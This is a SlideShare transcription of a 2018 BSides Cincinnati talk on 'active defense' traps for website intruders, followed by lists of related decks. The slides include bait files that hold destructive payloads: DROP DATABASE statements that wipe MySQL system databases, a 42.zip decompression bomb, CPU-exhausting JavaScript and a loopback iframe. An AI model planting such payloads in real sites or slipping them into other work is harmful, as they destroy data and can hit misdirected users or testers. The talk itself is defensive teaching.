SlideShare ist ein Scribd-Unternehmen logo

BSides Cincy: Active Defense - Helping threat actors hack themselves!

Als ODP, PDF herunterladen
ThreatReel Podcast
ThreatReel Podcast

These are the slides from my "Active Defense - Helping threat actors hack themselves!" presentation at the BSides Cincinnati Information Security Conference on 05/10/2018 in Cincinnati, Ohio.

Internet
1 von 41
Active Defense Helping Threat Actors Hack Themselves! May 12, 2018 Matt Scheurer @c3rkah Slides: https://www.slideshare.net/cerkah
About Me Matt Scheurer Systems Security Engineer with First Financial Bank Chair for the CiNPA Security SIG Speaker at DerbyCon 5.0, DerbyCon 7.0, the 10th Annual NKU Cyber Security Symposium, BSides Columbus 5.0, and BSides Indianapolis 2018 Certifications: CompTIA Security+, MCP, MCPS, MCTS, MCSA, and MCITP
Yes, I have a day job. However...Yes, I have a day job. However... Opinions expressed are solely my own and do not express the views or opinions of my employer.
Legal DisclaimerLegal Disclaimer The material presented is made available for informational and educational purposes only. Use of these tools and techniques is at your own risk! The presenter hereby disclaims any and all liability to any party for any direct, indirect, implied, punitive, special, incidental or other consequential damages arising directly or indirectly from any use of these materials, which are provided as is, and without warranties.
What is Active Defense?What is Active Defense? Active defense can refer to a defensive strategy in the military or cybersecurity arena. The Department of Defense defines active defense as: "The employment of limited offensive action and counterattacks to deny a contested area or position to the enemy.” In the cybersecurity arena, active defense may mean "asymmetric defenses," namely defenses that increase costs to cyber-adversaries by reducing costs to cyber- defenders. ● Source: https://en.wikipedia.org/wiki/Active_Defense
Why Active Defense?Why Active Defense? 1.Because “Hacking Back” is illegal! 2.Active Defense is the next level beyond honeypots, honeyfiles, and honeynets
Our ObjectivesOur Objectives 1.Shield and protect legitimate users at all times! ● Be diligent about protecting innocent site visitors... 2.Frustrate malicious threat actors attempting to steal and ex-filtrate data through unauthorized access ● Preferably by unwittingly hacking themselves... 3.See Objective #1!
Presentation FocusPresentation Focus ● Active Defense for a website ● Baiting and setting traps for script kiddies and other cyber criminals
InspirationsInspirations ● Aikido – Using an opponents energy / force against them ● My Father – Junk mail counter-strikes ● Nature – Animal Defenses ● Nostalgia – Everything old is new again... ● Security Minded – Yet a prankster at heart <3 ● Vigilante Nature – Love seeing the bad guys getting what they deserve!
Conventions UsedConventions Used Hot Water Index: ● Escalating thermometer temperature indicates the greater potential of getting reported for hosting malicious content
Protecting Legitimate UsersProtecting Legitimate Users ● Create a “robots.txt” file ● Create a Sitemap XML file ● Do not link to Active Defense Content – Use a link / hyperlink checker to verify ● Disable directory indexing on legitimate content ● Potentially protecting yourself by making use of authorized user only messages
“robots.txt” files“robots.txt” files Reference: http://www.robotstxt.org/ Example Sitemap: https://cybernnati.com/sitemap.xml User-agent: * Disallow: /cgi-bin/ Disallow: /complex/ # Company Confidential Information Disallow: /docs/ # Company Confidential Information Disallow: /org/ # Company Confidential Information Disallow: /protected/ # Company Confidential Information Disallow: /webmaster/ # Company Confidential Information Disallow: /wp-admin/ # WordPress Administration Files Disallow: /wp-content/ # WordPress CMS Files Disallow: /wp-includes/ # WordPress CMS Files
Sitemap XML filesSitemap XML files Reference: https://www.sitemaps.org/protocol.html Example <?xml version="1.0" encoding="utf-8"?> <urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0. 9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd"> <url> <loc>http://www.cybernnati.com/</loc> </url> </urlset>
Directory IndexesDirectory Indexes As a matter of good web security, disable directory Indexing on all legitimate web content! ● The lone exception for this is with our Active Defense content – This will help ensure that those purposely ignoring the borders and confines defined in our robots.txt and sitemap.xml files find our Active Defense content
Authorized Users OnlyAuthorized Users Only Example (README.txt or README.html): ------------- W A R N I N G ------------- THIS IS A PRIVATE AREA OF THIS WEBSITE. This website including all related data and information are provided only for authorized use. All connections and activity may be monitored for all lawful purposes, including to ensure that their use is authorized, for management of the system, to facilitate protection against unauthorized access, and to verify security procedures, survivability and operational security. Monitoring includes active attacks by authorized personnel and their entities to test or verify the security of the system. During monitoring, information may be examined, recorded, copied and used for authorized purposes. All information including personal information, placed on or sent over this system may be monitored. Uses of this system, authorized or unauthorized, constitutes consent to monitoring of this system. Unauthorized use is prohibited! Unauthorized use may subject you to criminal prosecution. Evidence of any such unauthorized use collected during monitoring may be used for administrative, criminal or other adverse action. Use of this system constitutes consent to monitoring for these purposes.
The Roundtrip RoundkickThe Roundtrip Roundkick Hot Water Index ● Create a bunch of unused DNS sub-domain host records pointing back to 127.0.0.1 ● The harder the attackers try to hit you at these sub-domains, the harder they are actually hitting themselves
Subdomain ExamplesSubdomain Examples ● api ● app ● bbs ● blog ● cloud ● dev ● email ● forum ● ftp ● host ● m ● mail ● mailserver ● mx ● ns ● ns1 ● ns2 ● owa ● pop ● portal ● remote ● secure ● server ● shop ● smtp ● support ● test ● vpn ● web ● webmail ● autodiscover ● wordpress
Stomachvivor / Gross OutStomachvivor / Gross Out ● Stage an unreferenced folder with a fake door badge ID template – NOTE: Not too similar to one’s you actually use! ● Place “gross-out” pictures of choice disguised as staff photo headshots
Phony Photo IDsPhony Photo IDs /complex/buildings/access/2017_headshots/ Guthrie_Ricky.jpeg /complex/buildings/access/ Door_Badge_ID_Template.jpg
Reflector MadnessReflector Madness ● Create an easy to crack password protected folder ● What’s waiting inside is not something threat actors will expect...
Can you guess my credentials?Can you guess my credentials? .htaccess file: AuthType Basic AuthName "protected" AuthUserFile "/home2/<SNIP>/.htpas swds/public_html/protec ted/passwd" require valid-user ● HINT: It’s possibly one of the worst username and password combinations you could have on a network device
Reward for cracking the login is?Reward for cracking the login is? ● Probably this… ● But maybe this!
Inside the source codeInside the source code ● A no borders iFrame pointing back to the loopback address... – If an attacker is running a web server locally on their system then they may potentially attack themselves <!DOCTYPE html> <html dir="ltr" lang="en-us"> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <title>CyberNnati</title> </head> <body style="margin: 0px; padding: 0px; overflow: hidden"> <div> <iframe src="http://127.0.0.1/" style="position: absolute; width: 100%; height: 100%; border: none"> </iframe> </div> </body> </html>
Going Nowhere Fast!Going Nowhere Fast! ● WordPress is by far the most deployed CMS in the World powering countless web sites ● Consequently the WordPress login page is one the most targeted for brute force attacks by malicious threat actors
Try Guessing my Credentials Now?Try Guessing my Credentials Now? This is a live “wp-login.php” page:
What went wrong?What went wrong? The web page you just saw was a completely fabricated WordPress login page. And there is absolutely no real username or password. The goal is to have brute force attackers spin their wheels thus wasting their time, energy, and resources! This is further sold by planting the appropriate folder structure and default files that give away a site as a WordPress site.
Pi to the FacePi to the Face ● There is quite a bit to unpack for this Active Defense strategy... – From disinformation, to wasting attackers time, to potentially getting them banned from larger service providers, to burning their CPU cycles and draining batteries ● We start by using the enterprising cyber criminals own CryptoJacking techniques against them...
The Setup...The Setup... ● Have a “webmaster” folder containing a fictitious “bookmarks.html” file ● Stage non-existent login account links for popular sites and services an attacker might waste time attempting to brute force – Hopefully they trip whatever alert thresholds these service providers may have in place resulting in a ban or being reported to a threat intelligence feed! ● Behind the scenes we are computationally calculating Pi hundreds of thousands of times – Wash, rinse, repeat!
Inside “bookmarks.html”Inside “bookmarks.html” Facebook: https://www.facebook.com/login.php?email=webmaster@cybernnati.com Google: https://mail.google.com/mail/u/?authuser=webmaster@cybernnati.com LinkedIn: https://www.linkedin.com/uas/login?email=webmaster@cybernnati.com Microsoft LiveID: https://login.live.com/login.srf?email=webmaster@cybernnati.com Twitter: https://twitter.com/login?username_or_email=webmaster@cybernnati.com Yahoo: https://login.yahoo.com/config/login?username=webmaster@cybernnati.com
Source CodeSource Code bookmarks.html Inside the <head> and </head> tags: <meta http-equiv="refresh" content="3.14"> Right before the </body> and </html> tags: <script src="./scripts/includes.js"></scr ipt> <script src="./scripts/pinapall.js"></scri pt> includes.js / pinapall.js var pinapall=0; var zzz=1; var enumeration=314159265; for (i=0;i<=enumeration;i++) { pinapall=pinapall+(4/zzz)-(4/ (zzz+2)) zzz=zzz+4 }
CPU Impacts to AttackersCPU Impacts to Attackers ● On a low powered system or dual-core VM this can spike the CPU up to 100% ● On a moderately powered system this may spike the CPU up to 50% – If they are already running a heavy CPU load then this will effectively spike the CPU all the way – Not uncommon with Java based tools like Burp ● Heavy CPU loads will drain batteries on mobile devices, including laptops, at a notably accelerated rate
The Wrong AnswerThe Wrong Answer ● Ever have to recover a system with a 100% full disk drive? ● Stage a file with an enticing name inside of an unreferenced folder such as: /docs/hr/employee_salary_history.xlsx.zip ● Which is really just a renamed version of the infamous “42.zip” file!
What is “42.zip”?What is “42.zip”? 42.zip is an approximately 42kb compressed zip file. Fully uncompressed the extracted files expand out to upwards of 4.2 Petabytes of data! ● Most data thieving cyber criminals won’t have a hard drive that large… :)
Bobby DropkickBobby Dropkick Cartoon From: https://xkcd.com/327/ Titled: “Exploits of a Mom”
The SetupThe Setup ● Stage a fake employee database dump file inside of an unreferenced folder: i.e., /org/departments/human_resources/ ● Give the file an enticing name such as: 2017-12-05_hris_employee_mysql_db_backup.zip - OR - 2017-12-05_hris_employee_mysql_db_backup.sql
What Else is Inside?What Else is Inside? Just a little SQL code to permanently wipe out the MySQL internal databases... DROP DATABASE mysql; DROP DATABASE sys; DROP DATABASE performance_schema; DROP DATABASE information_schema; If you thought recovering from a full disk situation was a hassle… :)
Alternative Active Defense OptionsAlternative Active Defense Options https://www.blackhillsinfosec.com/projects/adhd/ SEC550: Active Defense, Offensive Countermeasures and Cyber Deception https://www.sans.org/course/active- defense-offensive-countermeasures- and-cyber-deception
Criticisms, I’ve received a few...Criticisms, I’ve received a few... ● You should make the “Reflector Madness” login harder to crack – You’re in control... – Make it as simple or difficult to defeat as you like! ● This would make a legitimate penetration test more difficult – Have good documentation prepared in advance for white box or gray box engagements – An advance explanation of your robots.txt and sitemap should provide guidance
Other expressed concerns...Other expressed concerns... ● “We’re not going to implement this, it might really tick off some skilled attackers and vindictive types!” – Malicious threat actors are mostly undeterred today ● They do not fear retribution for their actions ● That is why they keep compromising vulnerable systems – The fact that Brian Krebs is still alive today is a testament to not living in fear of what might happen ● Krebs adversaries ultimately respect him more for continuing his work ● Still not convinced in implementing Active Defense strategies? – Then simply don’t implement them!
QuestionsQuestions Who ... What ... When ... Where ... Why ... How ...
Thank you for attending! May 12, 2018 Matt Scheurer @c3rkah Slides: https://www.slideshare.net/cerkah

Empfohlen

OISF Aniversary: Active Defense - Helping threat actors hack themselves!
OISF Aniversary: Active Defense - Helping threat actors hack themselves!OISF Aniversary: Active Defense - Helping threat actors hack themselves!
OISF Aniversary: Active Defense - Helping threat actors hack themselves!ThreatReel Podcast
 
BSides Cleveland: Active Defense - Helping threat actors hack themselves!
BSides Cleveland: Active Defense - Helping threat actors hack themselves!BSides Cleveland: Active Defense - Helping threat actors hack themselves!
BSides Cleveland: Active Defense - Helping threat actors hack themselves!ThreatReel Podcast
 
NKU Cybersecurity Symposium: Active Defense - Helping threat actors hack them...
NKU Cybersecurity Symposium: Active Defense - Helping threat actors hack them...NKU Cybersecurity Symposium: Active Defense - Helping threat actors hack them...
NKU Cybersecurity Symposium: Active Defense - Helping threat actors hack them...ThreatReel Podcast
 
BSides Columbus: Active Defense - Helping threat actors hack themselves!
BSides Columbus: Active Defense - Helping threat actors hack themselves!BSides Columbus: Active Defense - Helping threat actors hack themselves!
BSides Columbus: Active Defense - Helping threat actors hack themselves!ThreatReel Podcast
 
Getting Started With Hacking Android & iOS Apps? Tools, Techniques and resources
Getting Started With Hacking Android & iOS Apps? Tools, Techniques and resourcesGetting Started With Hacking Android & iOS Apps? Tools, Techniques and resources
Getting Started With Hacking Android & iOS Apps? Tools, Techniques and resourcesOWASP Delhi
 
Webinar - Tips and Tricks on Website Security
Webinar - Tips and Tricks on Website SecurityWebinar - Tips and Tricks on Website Security
Webinar - Tips and Tricks on Website SecurityStopTheHacker
 
Cyber Safety 101
Cyber Safety 101Cyber Safety 101
Cyber Safety 101Jeff Niebaum, M.A
 
Practical White Hat Hacker Training - Passive Information Gathering(OSINT)
Practical White Hat Hacker Training - Passive Information Gathering(OSINT)Practical White Hat Hacker Training - Passive Information Gathering(OSINT)
Practical White Hat Hacker Training - Passive Information Gathering(OSINT)PRISMA CSI
 

Empfohlen

OISF Aniversary: Active Defense - Helping threat actors hack themselves!
OISF Aniversary: Active Defense - Helping threat actors hack themselves!OISF Aniversary: Active Defense - Helping threat actors hack themselves!
OISF Aniversary: Active Defense - Helping threat actors hack themselves!ThreatReel Podcast
 
BSides Cleveland: Active Defense - Helping threat actors hack themselves!
BSides Cleveland: Active Defense - Helping threat actors hack themselves!BSides Cleveland: Active Defense - Helping threat actors hack themselves!
BSides Cleveland: Active Defense - Helping threat actors hack themselves!ThreatReel Podcast
 
NKU Cybersecurity Symposium: Active Defense - Helping threat actors hack them...
NKU Cybersecurity Symposium: Active Defense - Helping threat actors hack them...NKU Cybersecurity Symposium: Active Defense - Helping threat actors hack them...
NKU Cybersecurity Symposium: Active Defense - Helping threat actors hack them...ThreatReel Podcast
 
BSides Columbus: Active Defense - Helping threat actors hack themselves!
BSides Columbus: Active Defense - Helping threat actors hack themselves!BSides Columbus: Active Defense - Helping threat actors hack themselves!
BSides Columbus: Active Defense - Helping threat actors hack themselves!ThreatReel Podcast
 
Getting Started With Hacking Android & iOS Apps? Tools, Techniques and resources
Getting Started With Hacking Android & iOS Apps? Tools, Techniques and resourcesGetting Started With Hacking Android & iOS Apps? Tools, Techniques and resources
Getting Started With Hacking Android & iOS Apps? Tools, Techniques and resourcesOWASP Delhi
 
Webinar - Tips and Tricks on Website Security
Webinar - Tips and Tricks on Website SecurityWebinar - Tips and Tricks on Website Security
Webinar - Tips and Tricks on Website SecurityStopTheHacker
 
Cyber Safety 101
Cyber Safety 101Cyber Safety 101
Cyber Safety 101Jeff Niebaum, M.A
 
Practical White Hat Hacker Training - Passive Information Gathering(OSINT)
Practical White Hat Hacker Training - Passive Information Gathering(OSINT)Practical White Hat Hacker Training - Passive Information Gathering(OSINT)
Practical White Hat Hacker Training - Passive Information Gathering(OSINT)PRISMA CSI
 
Information on Brute Force Attack
Information on Brute Force AttackInformation on Brute Force Attack
Information on Brute Force AttackHTS Hosting
 
(SACON) Shomiron das gupta - threat hunting use cases
(SACON) Shomiron das gupta - threat hunting use cases(SACON) Shomiron das gupta - threat hunting use cases
(SACON) Shomiron das gupta - threat hunting use casesPriyanka Aash
 
When Dragons Attack - Tibetan hacking
When Dragons Attack - Tibetan hackingWhen Dragons Attack - Tibetan hacking
When Dragons Attack - Tibetan hackingIron Cove
 
The life of breached data and the attack lifecycle
The life of breached data and the attack lifecycleThe life of breached data and the attack lifecycle
The life of breached data and the attack lifecycleJarrod Overson
 
Fantastic Beasts and where to hide from them
Fantastic Beasts and where to hide from themFantastic Beasts and where to hide from them
Fantastic Beasts and where to hide from themVlad Styran
 
Linux confau 2019: Web Security 2019
Linux confau 2019: Web Security 2019Linux confau 2019: Web Security 2019
Linux confau 2019: Web Security 2019James Bromberger
 
Million Browser Botnet
Million Browser BotnetMillion Browser Botnet
Million Browser BotnetJeremiah Grossman
 
BSides Indianapolis: Phishing Forensics - Is it just suspicious or is it mali...
BSides Indianapolis: Phishing Forensics - Is it just suspicious or is it mali...BSides Indianapolis: Phishing Forensics - Is it just suspicious or is it mali...
BSides Indianapolis: Phishing Forensics - Is it just suspicious or is it mali...ThreatReel Podcast
 
Threat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghThreat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghOWASP Delhi
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultMohammed ALDOUB
 
Security for Data Scientists
Security for Data ScientistsSecurity for Data Scientists
Security for Data ScientistsDavid Arcos
 
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin AhmedBackup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin AhmedMazin Ahmed
 
Vulners report: comparing vulnerability world 2016 to 2017
Vulners report: comparing vulnerability world 2016 to 2017Vulners report: comparing vulnerability world 2016 to 2017
Vulners report: comparing vulnerability world 2016 to 2017Kirill Ermakov
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonBen Boyd
 
Sucuri Webinar: How Websites Get Hacked
Sucuri Webinar: How Websites Get HackedSucuri Webinar: How Websites Get Hacked
Sucuri Webinar: How Websites Get HackedSucuri
 
Advanced Threats and Lateral Movement Detection
Advanced Threats and Lateral Movement DetectionAdvanced Threats and Lateral Movement Detection
Advanced Threats and Lateral Movement DetectionGreg Foss
 
Beefy WordPress Security Wordcamp 2012 by Tammy Lee
Beefy WordPress Security Wordcamp 2012 by Tammy LeeBeefy WordPress Security Wordcamp 2012 by Tammy Lee
Beefy WordPress Security Wordcamp 2012 by Tammy LeeTop Draw Inc.
 
Preparing for a Security Breach
Preparing for a Security BreachPreparing for a Security Breach
Preparing for a Security BreachAlienVault
 
How to Help Your Customers Protect Themselves from Ransomware Attacks
How to Help Your Customers Protect Themselves from Ransomware AttacksHow to Help Your Customers Protect Themselves from Ransomware Attacks
How to Help Your Customers Protect Themselves from Ransomware AttacksSolarwinds N-able
 
WannaCry Ransomware
WannaCry Ransomware WannaCry Ransomware
WannaCry RansomwareZoho Corporation
 
DMA - Stupid Cyber Criminal Tricks
DMA - Stupid Cyber Criminal TricksDMA - Stupid Cyber Criminal Tricks
DMA - Stupid Cyber Criminal TricksThreatReel Podcast
 
(ISC)2 Cincinnati Tri-State Chapter: Phishing Forensics - Is it just suspicio...
(ISC)2 Cincinnati Tri-State Chapter: Phishing Forensics - Is it just suspicio...(ISC)2 Cincinnati Tri-State Chapter: Phishing Forensics - Is it just suspicio...
(ISC)2 Cincinnati Tri-State Chapter: Phishing Forensics - Is it just suspicio...ThreatReel Podcast
 

Weitere ähnliche Inhalte

Was ist angesagt?

Information on Brute Force Attack
Information on Brute Force AttackInformation on Brute Force Attack
Information on Brute Force AttackHTS Hosting
 
(SACON) Shomiron das gupta - threat hunting use cases
(SACON) Shomiron das gupta - threat hunting use cases(SACON) Shomiron das gupta - threat hunting use cases
(SACON) Shomiron das gupta - threat hunting use casesPriyanka Aash
 
When Dragons Attack - Tibetan hacking
When Dragons Attack - Tibetan hackingWhen Dragons Attack - Tibetan hacking
When Dragons Attack - Tibetan hackingIron Cove
 
The life of breached data and the attack lifecycle
The life of breached data and the attack lifecycleThe life of breached data and the attack lifecycle
The life of breached data and the attack lifecycleJarrod Overson
 
Fantastic Beasts and where to hide from them
Fantastic Beasts and where to hide from themFantastic Beasts and where to hide from them
Fantastic Beasts and where to hide from themVlad Styran
 
Linux confau 2019: Web Security 2019
Linux confau 2019: Web Security 2019Linux confau 2019: Web Security 2019
Linux confau 2019: Web Security 2019James Bromberger
 
BSides Indianapolis: Phishing Forensics - Is it just suspicious or is it mali...
BSides Indianapolis: Phishing Forensics - Is it just suspicious or is it mali...BSides Indianapolis: Phishing Forensics - Is it just suspicious or is it mali...
BSides Indianapolis: Phishing Forensics - Is it just suspicious or is it mali...ThreatReel Podcast
 
Threat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghThreat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghOWASP Delhi
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultMohammed ALDOUB
 
Security for Data Scientists
Security for Data ScientistsSecurity for Data Scientists
Security for Data ScientistsDavid Arcos
 
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin AhmedBackup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin AhmedMazin Ahmed
 
Vulners report: comparing vulnerability world 2016 to 2017
Vulners report: comparing vulnerability world 2016 to 2017Vulners report: comparing vulnerability world 2016 to 2017
Vulners report: comparing vulnerability world 2016 to 2017Kirill Ermakov
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonBen Boyd
 
Sucuri Webinar: How Websites Get Hacked
Sucuri Webinar: How Websites Get HackedSucuri Webinar: How Websites Get Hacked
Sucuri Webinar: How Websites Get HackedSucuri
 
Advanced Threats and Lateral Movement Detection
Advanced Threats and Lateral Movement DetectionAdvanced Threats and Lateral Movement Detection
Advanced Threats and Lateral Movement DetectionGreg Foss
 
Beefy WordPress Security Wordcamp 2012 by Tammy Lee
Beefy WordPress Security Wordcamp 2012 by Tammy LeeBeefy WordPress Security Wordcamp 2012 by Tammy Lee
Beefy WordPress Security Wordcamp 2012 by Tammy LeeTop Draw Inc.
 
Preparing for a Security Breach
Preparing for a Security BreachPreparing for a Security Breach
Preparing for a Security BreachAlienVault
 
How to Help Your Customers Protect Themselves from Ransomware Attacks
How to Help Your Customers Protect Themselves from Ransomware AttacksHow to Help Your Customers Protect Themselves from Ransomware Attacks
How to Help Your Customers Protect Themselves from Ransomware AttacksSolarwinds N-able
 

Was ist angesagt? (20)

Information on Brute Force Attack
Information on Brute Force AttackInformation on Brute Force Attack
Information on Brute Force Attack
 
(SACON) Shomiron das gupta - threat hunting use cases
(SACON) Shomiron das gupta - threat hunting use cases(SACON) Shomiron das gupta - threat hunting use cases
(SACON) Shomiron das gupta - threat hunting use cases
 
When Dragons Attack - Tibetan hacking
When Dragons Attack - Tibetan hackingWhen Dragons Attack - Tibetan hacking
When Dragons Attack - Tibetan hacking
 
The life of breached data and the attack lifecycle
The life of breached data and the attack lifecycleThe life of breached data and the attack lifecycle
The life of breached data and the attack lifecycle
 
Fantastic Beasts and where to hide from them
Fantastic Beasts and where to hide from themFantastic Beasts and where to hide from them
Fantastic Beasts and where to hide from them
 
Linux confau 2019: Web Security 2019
Linux confau 2019: Web Security 2019Linux confau 2019: Web Security 2019
Linux confau 2019: Web Security 2019
 
Million Browser Botnet
Million Browser BotnetMillion Browser Botnet
Million Browser Botnet
 
BSides Indianapolis: Phishing Forensics - Is it just suspicious or is it mali...
BSides Indianapolis: Phishing Forensics - Is it just suspicious or is it mali...BSides Indianapolis: Phishing Forensics - Is it just suspicious or is it mali...
BSides Indianapolis: Phishing Forensics - Is it just suspicious or is it mali...
 
Threat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep SinghThreat hunting 101 by Sandeep Singh
Threat hunting 101 by Sandeep Singh
 
Case Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by DefaultCase Study of Django: Web Frameworks that are Secure by Default
Case Study of Django: Web Frameworks that are Secure by Default
 
Security for Data Scientists
Security for Data ScientistsSecurity for Data Scientists
Security for Data Scientists
 
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin AhmedBackup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
Backup-File Artifacts - OWASP Khartoum InfoSec Sessions 2016 - Mazin Ahmed
 
Vulners report: comparing vulnerability world 2016 to 2017
Vulners report: comparing vulnerability world 2016 to 2017Vulners report: comparing vulnerability world 2016 to 2017
Vulners report: comparing vulnerability world 2016 to 2017
 
Threat hunting - Every day is hunting season
Threat hunting - Every day is hunting seasonThreat hunting - Every day is hunting season
Threat hunting - Every day is hunting season
 
Sucuri Webinar: How Websites Get Hacked
Sucuri Webinar: How Websites Get HackedSucuri Webinar: How Websites Get Hacked
Sucuri Webinar: How Websites Get Hacked
 
Advanced Threats and Lateral Movement Detection
Advanced Threats and Lateral Movement DetectionAdvanced Threats and Lateral Movement Detection
Advanced Threats and Lateral Movement Detection
 
Beefy WordPress Security Wordcamp 2012 by Tammy Lee
Beefy WordPress Security Wordcamp 2012 by Tammy LeeBeefy WordPress Security Wordcamp 2012 by Tammy Lee
Beefy WordPress Security Wordcamp 2012 by Tammy Lee
 
Preparing for a Security Breach
Preparing for a Security BreachPreparing for a Security Breach
Preparing for a Security Breach
 
How to Help Your Customers Protect Themselves from Ransomware Attacks
How to Help Your Customers Protect Themselves from Ransomware AttacksHow to Help Your Customers Protect Themselves from Ransomware Attacks
How to Help Your Customers Protect Themselves from Ransomware Attacks
 
WannaCry Ransomware
WannaCry Ransomware WannaCry Ransomware
WannaCry Ransomware
 

Ähnlich wie BSides Cincy: Active Defense - Helping threat actors hack themselves!

DMA - Stupid Cyber Criminal Tricks
DMA - Stupid Cyber Criminal TricksDMA - Stupid Cyber Criminal Tricks
DMA - Stupid Cyber Criminal TricksThreatReel Podcast
 
(ISC)2 Cincinnati Tri-State Chapter: Phishing Forensics - Is it just suspicio...
(ISC)2 Cincinnati Tri-State Chapter: Phishing Forensics - Is it just suspicio...(ISC)2 Cincinnati Tri-State Chapter: Phishing Forensics - Is it just suspicio...
(ISC)2 Cincinnati Tri-State Chapter: Phishing Forensics - Is it just suspicio...ThreatReel Podcast
 
ISSA COISS: : Phishing Forensics - Is it just suspicious or is it malicious?
ISSA COISS: : Phishing Forensics - Is it just suspicious or is it malicious?ISSA COISS: : Phishing Forensics - Is it just suspicious or is it malicious?
ISSA COISS: : Phishing Forensics - Is it just suspicious or is it malicious?ThreatReel Podcast
 
Circle City Con: Phishing Forensics - Is it just suspicious or is it malicious?
Circle City Con: Phishing Forensics - Is it just suspicious or is it malicious?Circle City Con: Phishing Forensics - Is it just suspicious or is it malicious?
Circle City Con: Phishing Forensics - Is it just suspicious or is it malicious?ThreatReel Podcast
 
Web Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your websiteWeb Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your websiteAndrew Sorensen
 
Cybersecurity: Malware & Protecting Your Business From Cyberthreats
Cybersecurity: Malware & Protecting Your Business From CyberthreatsCybersecurity: Malware & Protecting Your Business From Cyberthreats
Cybersecurity: Malware & Protecting Your Business From CyberthreatsSecureDocs
 
Information security - what is going on 2016
Information security - what is going on 2016Information security - what is going on 2016
Information security - what is going on 2016Tomppa Järvinen
 
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedLayer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedfangjiafu
 
Computer_Hacking_for_Beginners_Kevin_James_complex.pdf
Computer_Hacking_for_Beginners_Kevin_James_complex.pdfComputer_Hacking_for_Beginners_Kevin_James_complex.pdf
Computer_Hacking_for_Beginners_Kevin_James_complex.pdfxererenhosdominaram
 
Irm 6-website-defacement
Irm 6-website-defacementIrm 6-website-defacement
Irm 6-website-defacementKasper de Waard
 
Andrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.pptAndrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.pptSilverGold16
 
Mc physics colloquium2018-03-30.-handouts
Mc physics colloquium2018-03-30.-handoutsMc physics colloquium2018-03-30.-handouts
Mc physics colloquium2018-03-30.-handoutsKevin Wall
 
BSides Cleveland: Phishing Forensics - Is it just suspicious or is it malicious?
BSides Cleveland: Phishing Forensics - Is it just suspicious or is it malicious?BSides Cleveland: Phishing Forensics - Is it just suspicious or is it malicious?
BSides Cleveland: Phishing Forensics - Is it just suspicious or is it malicious?ThreatReel Podcast
 
Keynote at the Cyber Security Summit Prague 2015
Keynote at the Cyber Security Summit Prague 2015Keynote at the Cyber Security Summit Prague 2015
Keynote at the Cyber Security Summit Prague 2015Claus Cramon Houmann
 
Secrets of Google VRP by: Krzysztof Kotowicz, Google Security Team
Secrets of Google VRP by: Krzysztof Kotowicz, Google Security TeamSecrets of Google VRP by: Krzysztof Kotowicz, Google Security Team
Secrets of Google VRP by: Krzysztof Kotowicz, Google Security TeamOWASP Delhi
 
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers -
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers - [ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers -
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers - Zoltan Balazs
 

Ähnlich wie BSides Cincy: Active Defense - Helping threat actors hack themselves! (20)

DMA - Stupid Cyber Criminal Tricks
DMA - Stupid Cyber Criminal TricksDMA - Stupid Cyber Criminal Tricks
DMA - Stupid Cyber Criminal Tricks
 
(ISC)2 Cincinnati Tri-State Chapter: Phishing Forensics - Is it just suspicio...
(ISC)2 Cincinnati Tri-State Chapter: Phishing Forensics - Is it just suspicio...(ISC)2 Cincinnati Tri-State Chapter: Phishing Forensics - Is it just suspicio...
(ISC)2 Cincinnati Tri-State Chapter: Phishing Forensics - Is it just suspicio...
 
ISSA COISS: : Phishing Forensics - Is it just suspicious or is it malicious?
ISSA COISS: : Phishing Forensics - Is it just suspicious or is it malicious?ISSA COISS: : Phishing Forensics - Is it just suspicious or is it malicious?
ISSA COISS: : Phishing Forensics - Is it just suspicious or is it malicious?
 
Circle City Con: Phishing Forensics - Is it just suspicious or is it malicious?
